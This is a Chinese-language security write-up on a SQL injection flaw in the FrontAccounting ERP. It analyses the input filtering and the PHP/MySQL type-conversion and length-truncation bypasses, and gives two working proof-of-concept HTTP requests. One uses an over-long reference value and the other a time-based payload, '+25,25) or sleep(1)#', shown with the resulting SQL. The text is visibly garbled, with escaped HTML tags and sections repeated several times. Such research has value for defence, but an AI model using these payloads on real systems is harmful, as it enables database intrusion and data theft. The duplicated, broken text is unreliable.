Frontaccounting SQL注入漏洞分析与利用<\/h1>

漏洞概述<\/h2>
Frontaccounting是一款开源的会计系统(ERP)，在其某些版本中存在一个有趣的SQL注入漏洞。该漏洞源于对用户输入过滤不严，结合MySQL的特性实现了注入绕过。<\/p>

环境准备<\/h2>
测试环境：docker mattrayner\/lamp:latest-1604<\/p>

漏洞分析<\/h2>

过滤机制分析<\/h3>

Frontaccounting使用db_escape()<\/code>函数过滤参数，但某些参数未使用此函数。<\/p>

关键过滤函数位于includes\/session.inc:484<\/code>：<\/p>

\/\/ 使用ENT_QUOTES编码双引号和单引号
<\/span><\/span><\/span>\/\/ 输入时单双引号全部会被实体编码
<\/span><\/span><\/span><\/code><\/pre>注入点定位<\/h3>

在includes\/db\/class.reflines_db.inc:156<\/code>处，如果设置变量$reference<\/code>如'XXXXXX\'<\/code>，单引号可逃逸<\/li>
在admin\/void_transaction.php<\/code>中，$type<\/code>变量可控<\/li>
在purchasing\/includes\/db\/grn_db.inc<\/code>中，$reference<\/code>变量可控<\/li>
<\/ol>
关键注入路径<\/h3>

get_systype_db_info()<\/code>函数<\/li>
表grn_batch<\/code>的插入操作<\/li>
<\/ol>
绕过技术<\/h2>
PHP特性绕过<\/h3>
switch<\/span> ($type)
<\/span><\/span><\/code><\/pre>
'25'<\/code>和'+25dasdsadasda'<\/code>在PHP中被视为相同<\/li>
<\/ul>
MySQL特性绕过<\/h3>


MySQL在字符串和整型转换时的特性：<\/p>

'25'<\/code>和'25dasdasdasd'<\/code>等同于'+25dasdasdasd'<\/code><\/li>
整型和字符串可以相加<\/li>
<\/ul>
<\/li>

MySQL截断特性：<\/p>

可导致转义符被"吃掉"<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用(POC)<\/h2>
第一种利用方式<\/h3>
通过po_entry_items.php<\/code>中的insert方法：<\/p>
POST<\/span> \/FA1\/purchasing\/po_entry_items.php?JsHttpRequest=0-xml HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 127.0.0.1:8888<\/span>
<\/span><\/span>[...]<\/span>
<\/span><\/span>supplier_id=1&OrderDate=12\/31\/2018&ref=001100422222222222222222222201700422222222222222212222\/2018\\&supp_ref=...
<\/span><\/span><\/code><\/pre>关键点：<\/p>

$reference<\/code>变量在数据库中存储为60字节<\/li>
设置$reference<\/code>为61字节(如001100422222222222222222222201700422222222222222212222\/2018\\<\/code>)<\/li>
数据库中实际存储为001100422222222222222222222201700422222222222222212222\/2018\<\/code>，完成注入<\/li>
<\/ul>
第二种利用方式<\/h3>
通过void_transaction.php<\/code>：<\/p>
POST<\/span> \/FA1\/\/admin\/void_transaction.php?JsHttpRequest=0-xml HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 127.0.0.1:8888<\/span>
<\/span><\/span>[...]<\/span>
<\/span><\/span>filterType=%2b25%2c25)%20or%20sleep(1)%23&FromTransNo=1&ToTransNo=999999...
<\/span><\/span><\/code><\/pre>最终执行的SQL语句：<\/p>
SELECT<\/span> *<\/span> FROM<\/span> 0<\/span>_reflines WHERE<\/span> trans_type=<\/span>'+25,25) or sleep(1)#'<\/span> AND<\/span> CHAR_LENGTH<\/span>(`<\/span>prefix<\/span>`<\/span>) AND<\/span> LEFT<\/span>('20170042222222222222222222220170042222222222222221222222221\'<\/span>, CHAR_LENGTH<\/span>(`<\/span>prefix<\/span>`<\/span>)) =<\/span> `<\/span>prefix<\/span>`<\/span> UNION<\/span> SELECT<\/span> *<\/span> FROM<\/span> 0<\/span>_reflines WHERE<\/span> trans_type=<\/span>'+25,25) and sleep(1)#'<\/span> AND<\/span> `<\/span>prefix<\/span>`=<\/span>''<\/span>
<\/span><\/span><\/code><\/pre>漏洞修复<\/h2>
官方已发布修复补丁，建议升级到最新版本。<\/p>
总结<\/h2>

该漏洞利用了PHP和MySQL的类型转换特性<\/li>
通过精心构造的字符串长度实现注入<\/li>
+<\/code>符号在绕过中起到了关键作用<\/li>
漏洞存在于多个功能点，具有较大影响范围<\/li>
<\/ol>
防御建议<\/h2>

对所有用户输入使用统一的过滤函数<\/li>
使用参数化查询而非字符串拼接<\/li>
严格限制输入长度和类型<\/li>
升级到已修复的安全版本<\/li>
<\/ol>

Frontaccounting SQL注入漏洞分析与利用<\/h1>

漏洞概述<\/h2> Frontaccounting是一款开源的会计系统(ERP)，在其某些版本中存在一个有趣的SQL注入漏洞。该漏洞源于对用户输入过滤不严，结合MySQL的特性实现了注入绕过。<\/p>

环境准备<\/h2> 测试环境：docker mattrayner\/lamp:latest-1604<\/p>

漏洞分析<\/h2>

绕过技术<\/h2>

漏洞利用(POC)<\/h2>

漏洞修复<\/h2> 官方已发布修复补丁，建议升级到最新版本。<\/p>

防御建议<\/h2> 对所有用户输入使用统一的过滤函数<\/li> 使用参数化查询而非字符串拼接<\/li> 严格限制输入长度和类型<\/li> 升级到已修复的安全版本<\/li> <\/ol>

漏洞概述<\/h2>
Frontaccounting是一款开源的会计系统(ERP)，在其某些版本中存在一个有趣的SQL注入漏洞。该漏洞源于对用户输入过滤不严，结合MySQL的特性实现了注入绕过。<\/p>

环境准备<\/h2>
测试环境：docker mattrayner\/lamp:latest-1604<\/p>

漏洞修复<\/h2>
官方已发布修复补丁，建议升级到最新版本。<\/p>

防御建议<\/h2>

对所有用户输入使用统一的过滤函数<\/li>
使用参数化查询而非字符串拼接<\/li>
严格限制输入长度和类型<\/li>
升级到已修复的安全版本<\/li> <\/ol>